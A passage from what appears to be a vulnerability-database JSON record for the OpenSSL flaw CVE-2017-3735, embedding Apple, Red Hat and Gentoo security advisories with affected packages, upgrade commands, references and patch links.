addressed with improved\nbounds checking. \nCVE-2017-3735: found by OSS-Fuzz\n\nScreen Sharing Server\nAvailable for: macOS High Sierra 10.13.1, macOS Sierra 10.12.6\nImpact: A user with screen sharing access may be able to access any\nfile readable by root\nDescription: A permissions issue existed in the handling of screen\nsharing sessions. This issue was addressed with improved permissions\nhandling. \nCVE-2017-13826: Trevor Jacques of Toronto\n\nInstallation note:\n\nmacOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and\nSecurity Update 2017-005 El Capitan may be obtained from the\nMac App Store or Apple\u0027s Software Downloads web site:\nhttps://support.apple.com/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAlooN9kpHHByb2R1Y3Qt\nc2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEbvlg/7\nBub6HL7Bv+9taMMz+3Rl2exjVIBv3fUflhpLh1524wFe6UjUyy4Z3X0t/LKogGwb\nGkHmcvDTK+85yLJeF0XQLHzzeITPrAiQ06FSnpzq6GjDEgczgbyJtw6aT4iagDgK\nNYfWnmU1XDjpx35kjEyyZblIxDHsvMJRelMdjx4w6In3Pgi+DG+ndYbK5hoaImOX\nYwaoc2xzGUXpnJU6Y5tkIbVBF4P4tZQcJJt6cfhTOcR9+ut87HQqc9mo1UGMUqAv\nz0kYZ4MtGRM4uDiVynkKxwj+NNtSVxwvf1mN2Jb7ApFt0lAfmS8L8xzI15NlbJxJ\noSuIvVi3pAhOkO7etaC/CLOxw+wRGaRbaf1i4VmaLI6HW2H2/vWiL1KDhHFIIfVq\nxBGday+yWkaS9o8B85QZy2GHxEFYxzMvArtzK3tBj2kZCuEcJis60CanwZOSbcsp\n4IlEKVGabMNwGwOVX22UwrLCtMzsqSVZpYyKy/m7n6DXnpspuWTohDmc68zq/4nj\n5LgGTFz8IUaT1ujQZq9g4siVeXzu0bsAgttauRlrWilUsDtpsv5s+dkGlXPFxbDf\nBuvNgqGSg/xz0QRGmJ7UA3g3L7fTvWhOzXnBOh7c45OpYT54tqGIEi6Bk72NyPz+\nioQ7LBPJE6RCSy5XZJ6x8YwSYp+kO8BBPaYsxSoxXCs=\n=2VBd\n-----END PGP SIGNATURE-----\n\n\n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security, bug fix, and enhancement update\nAdvisory ID: RHSA-2018:3221-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2018:3221\nIssue date: 2018-10-30\nCVE Names: CVE-2017-3735 CVE-2018-0495 CVE-2018-0732 \n CVE-2018-0737 CVE-2018-0739 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, ppc64le, s390x\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le, s390x\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. \n\nSecurity Fix(es):\n\n* openssl: ROHNP - Key Extraction Side Channel in Multiple Crypto Libraries\n(CVE-2018-0495)\n\n* openssl: Malicious server can send large prime to client during DH(E) TLS\nhandshake causing the client to hang (CVE-2018-0732)\n\n* openssl: Handling of crafted recursive ASN.1 structures can cause a stack\noverflow and resulting denial of service (CVE-2018-0739)\n\n* openssl: Malformed X.509 IPAdressFamily could cause OOB read\n(CVE-2017-3735)\n\n* openssl: RSA key generation cache timing vulnerability in\ncrypto/rsa/rsa_gen.c allows attackers to recover private keys\n(CVE-2018-0737)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.6 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1486144 - CVE-2017-3735 openssl: Malformed X.509 IPAdressFamily could cause OOB read\n1548401 - modify X509_NAME comparison function to be case sensitive for CA name lists in SSL\n1561266 - CVE-2018-0739 openssl: Handling of crafted recursive ASN.1 structures can cause a stack overflow and resulting denial of service\n1568253 - CVE-2018-0737 openssl: RSA key generation cache timing vulnerability in crypto/rsa/rsa_gen.c allows attackers to recover private keys\n1585004 - ppc64le opensslconf.h is incompatible with swig\n1591100 - CVE-2018-0732 openssl: Malicious server can send large prime to client during DH(E) TLS handshake causing the client to hang\n1591163 - CVE-2018-0495 openssl: ROHNP - Key Extraction Side Channel in Multiple Crypto Libraries\n1603597 - Confusing error message when asking for invalid DSA parameter sizes in FIPS mode\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.2k-16.el7.src.rpm\n\nx86_64:\nopenssl-1.0.2k-16.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-16.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7.x86_64.rpm\nopenssl-libs-1.0.2k-16.el7.i686.rpm\nopenssl-libs-1.0.2k-16.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-16.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7.x86_64.rpm\nopenssl-devel-1.0.2k-16.el7.i686.rpm\nopenssl-devel-1.0.2k-16.el7.x86_64.rpm\nopenssl-perl-1.0.2k-16.el7.x86_64.rpm\nopenssl-static-1.0.2k-16.el7.i686.rpm\nopenssl-static-1.0.2k-16.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.2k-16.el7.src.rpm\n\nx86_64:\nopenssl-1.0.2k-16.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-16.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7.x86_64.rpm\nopenssl-libs-1.0.2k-16.el7.i686.rpm\nopenssl-libs-1.0.2k-16.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-16.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7.x86_64.rpm\nopenssl-devel-1.0.2k-16.el7.i686.rpm\nopenssl-devel-1.0.2k-16.el7.x86_64.rpm\nopenssl-perl-1.0.2k-16.el7.x86_64.rpm\nopenssl-static-1.0.2k-16.el7.i686.rpm\nopenssl-static-1.0.2k-16.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.2k-16.el7.src.rpm\n\nppc64:\nopenssl-1.0.2k-16.el7.ppc64.rpm\nopenssl-debuginfo-1.0.2k-16.el7.ppc.rpm\nopenssl-debuginfo-1.0.2k-16.el7.ppc64.rpm\nopenssl-devel-1.0.2k-16.el7.ppc.rpm\nopenssl-devel-1.0.2k-16.el7.ppc64.rpm\nopenssl-libs-1.0.2k-16.el7.ppc.rpm\nopenssl-libs-1.0.2k-16.el7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.2k-16.el7.ppc64le.rpm\nopenssl-debuginfo-1.0.2k-16.el7.ppc64le.rpm\nopenssl-devel-1.0.2k-16.el7.ppc64le.rpm\nopenssl-libs-1.0.2k-16.el7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.2k-16.el7.s390x.rpm\nopenssl-debuginfo-1.0.2k-16.el7.s390.rpm\nopenssl-debuginfo-1.0.2k-16.el7.s390x.rpm\nopenssl-devel-1.0.2k-16.el7.s390.rpm\nopenssl-devel-1.0.2k-16.el7.s390x.rpm\nopenssl-libs-1.0.2k-16.el7.s390.rpm\nopenssl-libs-1.0.2k-16.el7.s390x.rpm\n\nx86_64:\nopenssl-1.0.2k-16.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-16.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7.x86_64.rpm\nopenssl-devel-1.0.2k-16.el7.i686.rpm\nopenssl-devel-1.0.2k-16.el7.x86_64.rpm\nopenssl-libs-1.0.2k-16.el7.i686.rpm\nopenssl-libs-1.0.2k-16.el7.x86_64.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):\n\nSource:\nopenssl-1.0.2k-16.el7.src.rpm\n\naarch64:\nopenssl-1.0.2k-16.el7.aarch64.rpm\nopenssl-debuginfo-1.0.2k-16.el7.aarch64.rpm\nopenssl-devel-1.0.2k-16.el7.aarch64.rpm\nopenssl-libs-1.0.2k-16.el7.aarch64.rpm\n\nppc64le:\nopenssl-1.0.2k-16.el7.ppc64le.rpm\nopenssl-debuginfo-1.0.2k-16.el7.ppc64le.rpm\nopenssl-devel-1.0.2k-16.el7.ppc64le.rpm\nopenssl-libs-1.0.2k-16.el7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.2k-16.el7.s390x.rpm\nopenssl-debuginfo-1.0.2k-16.el7.s390.rpm\nopenssl-debuginfo-1.0.2k-16.el7.s390x.rpm\nopenssl-devel-1.0.2k-16.el7.s390.rpm\nopenssl-devel-1.0.2k-16.el7.s390x.rpm\nopenssl-libs-1.0.2k-16.el7.s390.rpm\nopenssl-libs-1.0.2k-16.el7.s390x.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):\n\naarch64:\nopenssl-debuginfo-1.0.2k-16.el7.aarch64.rpm\nopenssl-perl-1.0.2k-16.el7.aarch64.rpm\nopenssl-static-1.0.2k-16.el7.aarch64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.2k-16.el7.ppc64le.rpm\nopenssl-perl-1.0.2k-16.el7.ppc64le.rpm\nopenssl-static-1.0.2k-16.el7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.2k-16.el7.s390.rpm\nopenssl-debuginfo-1.0.2k-16.el7.s390x.rpm\nopenssl-perl-1.0.2k-16.el7.s390x.rpm\nopenssl-static-1.0.2k-16.el7.s390.rpm\nopenssl-static-1.0.2k-16.el7.s390x.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.2k-16.el7.ppc.rpm\nopenssl-debuginfo-1.0.2k-16.el7.ppc64.rpm\nopenssl-perl-1.0.2k-16.el7.ppc64.rpm\nopenssl-static-1.0.2k-16.el7.ppc.rpm\nopenssl-static-1.0.2k-16.el7.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.2k-16.el7.ppc64le.rpm\nopenssl-perl-1.0.2k-16.el7.ppc64le.rpm\nopenssl-static-1.0.2k-16.el7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.2k-16.el7.s390.rpm\nopenssl-debuginfo-1.0.2k-16.el7.s390x.rpm\nopenssl-perl-1.0.2k-16.el7.s390x.rpm\nopenssl-static-1.0.2k-16.el7.s390.rpm\nopenssl-static-1.0.2k-16.el7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.2k-16.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7.x86_64.rpm\nopenssl-perl-1.0.2k-16.el7.x86_64.rpm\nopenssl-static-1.0.2k-16.el7.i686.rpm\nopenssl-static-1.0.2k-16.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.2k-16.el7.src.rpm\n\nx86_64:\nopenssl-1.0.2k-16.el7.x86_64.rpm\nopenssl-debuginfo-1.0.2k-16.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7.x86_64.rpm\nopenssl-devel-1.0.2k-16.el7.i686.rpm\nopenssl-devel-1.0.2k-16.el7.x86_64.rpm\nopenssl-libs-1.0.2k-16.el7.i686.rpm\nopenssl-libs-1.0.2k-16.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.2k-16.el7.i686.rpm\nopenssl-debuginfo-1.0.2k-16.el7.x86_64.rpm\nopenssl-perl-1.0.2k-16.el7.x86_64.rpm\nopenssl-static-1.0.2k-16.el7.i686.rpm\nopenssl-static-1.0.2k-16.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-3735\nhttps://access.redhat.com/security/cve/CVE-2018-0495\nhttps://access.redhat.com/security/cve/CVE-2018-0732\nhttps://access.redhat.com/security/cve/CVE-2018-0737\nhttps://access.redhat.com/security/cve/CVE-2018-0739\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.6_release_notes/index\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBW9gQkdzjgjWX9erEAQgQZQ/8CfvagNmJ9p3eWlbk5NOClhF4mxZjzHUc\nj8kOWrBXKt+VsCknJJTwKOkzrljUJ/XgHo4vu/G9F6O3Oj62roWmW5OJKtlmD3xl\nVOhUNNmWalVsQ1i1CgI7Khf2Xq9SaMnCaTDpoTamAAznrcj7T2AGABIzPeK0+WL7\nGctOtuZoC04CSUbg4z3I6KWYZAh9Id6qbYLcMYSNbTGW7FKl15GOQsu2atwwoWhg\n9BA6QhEULWiob/MWcGIrZZl3Bqm2cngC+FhxklsWJ9BC0zRsCJZROBg2eYVCwW78\nZwXiS5rQCSNkmGO4GK239aSyjMmtwrZBzfLsFXz1Enp7kKle6EqnA655p4cu78I8\nHXxmBOceOq7NlG3Zz4PKafmkqZMHoriIxGDgGYWxMBb2Tdk7ZerhsaA1fW9dDPIZ\nzNxF0LngoaZbu49DKv/Doiqcs9nsyvoYpBMeALAM1hAZRhk7o31HJS9i7O/YzuWc\nuL7wgtQRgyxtFXaRlleWU8pWsTx9NtpvtPiMJQzkw19UX3El5DQv+8x+hNholuZa\npfA9UWrhLfYVk0ZZRzI9pYgpsEJ9Ga3TgykpM048V4+84KVDRkkLHxGM1p3rvX01\neCRYyB0VzbFhKwxdyRniBITh3e2+uaYkG7zYSX+ewXu2rOTN8uLrK87rHDliQnvS\nnuWE/iwTIDU=\n=jMog\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. This issue only applied to Ubuntu 16.04\nLTS, Ubuntu 16.10 and Ubuntu 17.04. \n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201712-03\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: OpenSSL: Multiple vulnerabilities\n Date: December 14, 2017\n Bugs: #629290, #636264, #640172\n ID: 201712-03\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, the worst of which\nmay lead to a Denial of Service condition. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.2n \u003e= 1.0.2n\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. Please review\nthe referenced CVE identifiers for details. \n\nImpact\n======\n\nA remote attacker could cause a Denial of Service condition, recover a\nprivate key in unlikely circumstances, circumvent security restrictions\nto perform unauthorized actions, or gain access to sensitive\ninformation. \n\nWorkaround\n==========\n\nThere are no known workarounds at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.2n\"\n\nReferences\n==========\n\n[ 1 ] CVE-2017-3735\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3735\n[ 2 ] CVE-2017-3736\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3736\n[ 3 ] CVE-2017-3737\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3737\n[ 4 ] CVE-2017-3738\n https://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-3738\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201712-03\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2017 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n--IrEhWFjxIJsFtqH1v1HHQsLm3nLmhNeP4--\n\n", "sources": [ { "db": "NVD", "id": "CVE-2017-3735" }, { "db": "JVNDB", "id": "JVNDB-2017-007691" }, { "db": "BID", "id": "100515" }, { "db": "VULMON", "id": "CVE-2017-3735" }, { "db": "PACKETSTORM", "id": "150193" }, { "db": "PACKETSTORM", "id": "147233" }, { "db": "PACKETSTORM", "id": "145270" }, { "db": "PACKETSTORM", "id": "150049" }, { "db": "PACKETSTORM", "id": "144899" }, { "db": "PACKETSTORM", "id": "145423" } ], "trust": 2.52 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-3735", "trust": 3.4 }, { "db": "BID", "id": "100515", "trust": 2.0 }, { "db": "SECTRACK", "id": "1039726", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2017-15", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2017-14", "trust": 1.7 }, { "db": "ICS CERT", "id": "ICSA-19-024-02", "trust": 0.9 }, { "db": "JVNDB", "id": "JVNDB-2017-007691", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2019.1967", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.4645", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.0798", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.2267", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2020.0095", "trust": 0.6 }, { "db": "AUSCERT", "id": "ESB-2019.2536", "trust": 0.6 }, { "db": "JUNIPER", "id": "JSA10990", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201708-1172", "trust": 0.6 }, { "db": "MCAFEE", "id": "SB10211", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2017-3735", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150193", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "147233", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145270", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "150049", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "144899", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "145423", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2017-3735" }, { "db": "BID", "id": "100515" }, { "db": "JVNDB", "id": "JVNDB-2017-007691" }, { "db": "PACKETSTORM", "id": "150193" }, { "db": "PACKETSTORM", "id": "147233" }, { "db": "PACKETSTORM", "id": "145270" }, { "db": "PACKETSTORM", "id": "150049" }, { "db": "PACKETSTORM", "id": "144899" }, { "db": "PACKETSTORM", "id": "145423" }, { "db": "CNNVD", "id": "CNNVD-201708-1172" }, { "db": "NVD", "id": "CVE-2017-3735" } ] }, "id": "VAR-201708-1311", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.11111111 }, "last_update_date": "2022-05-05T07:01:50.040000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Malformed X.509 IPAddressFamily could cause OOB read (CVE-2017-3735)", "trust": 0.8, "url": "https://www.openssl.org/news/secadv/20170828.txt" }, { "title": "OpenSSL Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=74447" }, { "title": "The Register", "trust": 0.2, "url": "https://www.theregister.co.uk/2019/02/11/phoenix_switch_flaws/" }, { "title": "Red Hat: Moderate: openssl security, bug fix, and enhancement update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20183221 - security advisory" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3475-1" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3611-2" }, { "title": "Debian Security Advisories: DSA-4017-1 openssl1.0 -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=c59b0b63bafaa6def9e5da50acf68ca8" }, { "title": "Debian Security Advisories: DSA-4018-1 openssl -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=ac7ab332aa094dcdde4da9f7cb2a19f1" }, { "title": "Red Hat: CVE-2017-3735", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2017-3735" }, { "title": "IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to security vulnerabilities (CVE-2018-0732, CVE-2018-0739, CVE-2017-3735)", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=51b3583e976e4985408312c607116f9d" }, { "title": "IBM: IBM Security Bulletin: Vulnerability in OpenSSL affects Power Hardware Management Console", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c5bef9c9c0b7083c0a7333444658c6c0" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2017-3735" }, { "title": "Amazon Linux AMI: ALAS-2018-1102", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2018-1102" }, { "title": "Symantec Security Advisories: SA157: OpenSSL Vulnerabilities 28-Aug-2017 and 2-Nov-2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=7d613a491eb4632d0bd09811cbeaee1e" }, { "title": "Arch Linux Advisories: [ASA-201712-9] openssl-1.0: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201712-9" }, { "title": "Arch Linux Advisories: [ASA-201711-14] openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201711-14" }, { "title": "Arch Linux Advisories: [ASA-201711-15] lib32-openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201711-15" }, { "title": "Arch Linux Advisories: [ASA-201712-11] lib32-openssl-1.0: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201712-11" }, { "title": "Red Hat: Critical: Red Hat Ansible Tower 3.3.1-2 Release - Container Image", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20183505 - security advisory" }, { "title": "Amazon Linux 2: ALAS2-2018-1102", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2018-1102" }, { "title": "Tenable Security Advisories: [R1] Nessus 6.11.3 Fixes Multiple Third-party Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2017-15" }, { "title": "Brocade Security Advisories: BSA-2017-426", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=54471d90bb958ec54738385d1e0df724" }, { "title": "Tenable Security Advisories: [R1] SecurityCenter 5.6.0.1 Fixes Multiple Third-party Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2017-14" }, { "title": "Apple: macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=cc1324af84bd22e484cbe183e71a45d0" }, { "title": "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities fixed in IBM Security Access Manager Appliance", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=a0291f848728c4e1a69043ce8e1fd54d" }, { "title": "IBM: IBM Security Bulletin: Multiple Security vulnerabilities have been fixed in the IBM Security Access Manager Appliance", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1519a5f830589c3bab8a20f4163374ae" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=204a1aa9ebf7b5f47151e8b011269862" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2019", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=f655264a6935505d167bbf45f409a57b" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=9cb9a8ed428c6faca615e91d2f1a216d" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=81c63752a6f26433af2128b2e8c02385" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=72fe5ebf222112c8481815fd7cefc7af" }, { "title": "IBM: IBM Security Bulletin: IBM Security Privileged Identity Manager is affected by multiple security vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8580d3cd770371e2ef0f68ca624b80b0" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=6283337cd31f81f24d445925f2138c0e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "core-kit", "trust": 0.1, "url": "https://github.com/funtoo/core-kit " } ], "sources": [ { 